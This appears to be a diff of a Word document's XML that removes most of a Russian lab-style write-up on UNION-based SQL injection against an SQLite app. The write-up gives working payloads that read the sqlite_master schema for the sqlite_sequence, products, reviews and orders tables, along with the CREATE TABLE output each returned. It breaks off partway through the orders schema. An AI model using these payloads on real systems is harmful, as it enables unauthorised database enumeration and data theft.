-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite_master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE name='</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite_sequence</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Результат</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">CREATE </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">TABLE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sequence</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>name,seq</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Узнаем</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>структуру</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>таблицы</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>products</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">– </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sql,NULL,NULL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite_master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE name='</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>products</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Результат</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>CREATE TABLE products (</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>user_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> INTEG</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ER PRIMARY KEY AUTOINCREMENT,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TEXT NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>description</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TEXT NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>price_cents</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NO</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>T NULL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Узнаем</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>структуру</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>таблицы</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>reviews</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">– </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sql,NULL,NULL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite_master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE name='</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>reviews</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Результат</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>CREATE TABLE reviews (</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEG</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ER PRIMARY KEY AUTOINCREMENT,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>product_id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>user_id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>content</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TEXT NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>created_at</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">FOREIGN </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>KEY(p</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="357"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Узнаем</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>структуру</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>таблицы</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>orders</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">– </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sql,NULL,NULL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sqlite_master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE name='</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>orders</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'--</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Результат</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>CREATE TABLE orders (</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER PRIMARY KEY </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>AUTOINCREMENT,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>user_id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>created_at</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>total_cents</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
-        <w:ind w:left="360" w:firstLine="348"/>
